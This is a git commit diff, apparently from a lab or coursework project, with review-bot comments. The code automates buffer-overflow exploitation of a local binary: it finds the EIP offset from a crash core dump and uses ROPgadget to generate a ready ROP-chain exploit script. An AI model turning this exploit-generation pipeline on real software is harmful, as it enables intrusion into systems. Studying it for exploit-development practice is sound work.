Run ROPGadget with auto offset
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
parent
a8cbc66faf
commit
688bb5a1be
1
init.sh
1
init.sh
@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
|
||||
sudo apt-get --quiet --assume-yes install zsh
|
||||
|
||||
sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
|
||||
sudo apt-get --assume-yes --quiet install python
|
||||
python3 -m pip install --upgrade pip
|
||||
python3 -m pip install --upgrade pwntools
|
||||
|
||||
|
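Review bot: None of the install commands visible in this hunk provisions the `ROPgadget` command that the new offset.py in this same commit runs via `subprocess.run(["ROPgadget", ...])`, so a fresh machine set up by init.sh will fail at that call unless the tool is installed outside the hunk. If it is not, add `python3 -m pip install --upgrade ROPGadget` next to the `python3 -m pip install --upgrade pwntools` line. Which of the seven lines is the single addition is not recoverable from this rendering, so the pip installs may be pre-existing, but both are unpinned and will pull whatever PyPI serves on the day the script runs; pinning versions (or at least recording the installed versions) keeps the environment reproducible for anyone reusing the offset output.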
43
offset.py
43
offset.py
@ -2,26 +2,43 @@ from pwnlib.elf.corefile import Coredump
|
||||
from pwnlib.util.cyclic import cyclic, cyclic_find
|
||||
from pwnlib.util.packing import pack
|
||||
from pwnlib.tubes.process import process
|
||||
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
# TODO: command line arguments
|
||||
input_file = "input.txt"
|
||||
exec_name = "./vuln-32"
|
||||
core_file = "./core"
|
||||
|
||||
os.remove(core_file)
|
||||
def find_offset(exec_name):
|
||||
# TODO: command line arguments
|
||||
input_file = "input.txt"
|
||||
core_file = "./core"
|
||||
|
||||
# TODO Loop until a crash, increase payload size each iteration
|
||||
with open(input_file, "wb") as f:
|
||||
payload = cyclic(512)
|
||||
f.write(payload)
|
||||
os.remove(core_file)
|
||||
|
||||
process([exec_name, input_file]).wait()
|
||||
# TODO Loop until a crash, increase payload size each iteration
|
||||
with open(input_file, "wb") as f:
|
||||
payload = cyclic(512)
|
||||
f.write(payload)
|
||||
|
||||
core = Coredump('./core')
|
||||
process([exec_name, input_file]).wait()
|
||||
|
||||
assert pack(core.eip) in payload
|
||||
core = Coredump('./core')
|
||||
|
||||
print(cyclic_find(core.eip))
|
||||
assert pack(core.eip) in payload
|
||||
|
||||
os.remove(input_file)
|
||||
os.remove(input_file)
|
||||
|
||||
return cyclic_find(core.eip)
|
||||
|
||||
offset = find_offset(exec_name)
|
||||
|
||||
# print("\t# Padding goes here") <-- search for this
|
||||
# print("\tp = ''\n")
|
||||
|
||||
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
|
||||
stdout = result.stdout
|
||||
|
||||
|
||||
stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
|
||||
with open("test.py", "wb") as f:
|
||||
f.write(stdout)
|
||||
|
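Review bot: The new ROPgadget invocation at `result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)` never inspects `result.returncode`, so when the gadget search fails (or the binary has no usable chain) `stdout` is empty or partial and the script still writes it to `test.py` as if it were a valid exploit; pass `check=True` so a non-zero exit raises `CalledProcessError` before the `.replace` runs. Inside `find_offset`, `os.remove(core_file)` runs before the target has ever crashed, so on a first run with no `./core` present it raises `FileNotFoundError`; wrap it as `with contextlib.suppress(FileNotFoundError): os.remove(core_file)` (adding `import contextlib` to the import block, whose first line lies outside this hunk). `core = Coredump('./core')` also hard-codes the path that `core_file` already names two lines above; `Coredump(core_file)` keeps the two in step. The `assert pack(core.eip) in payload` check is stripped under `python -O`, so a `raise RuntimeError(...)` would be the safer guard against reporting a bogus offset.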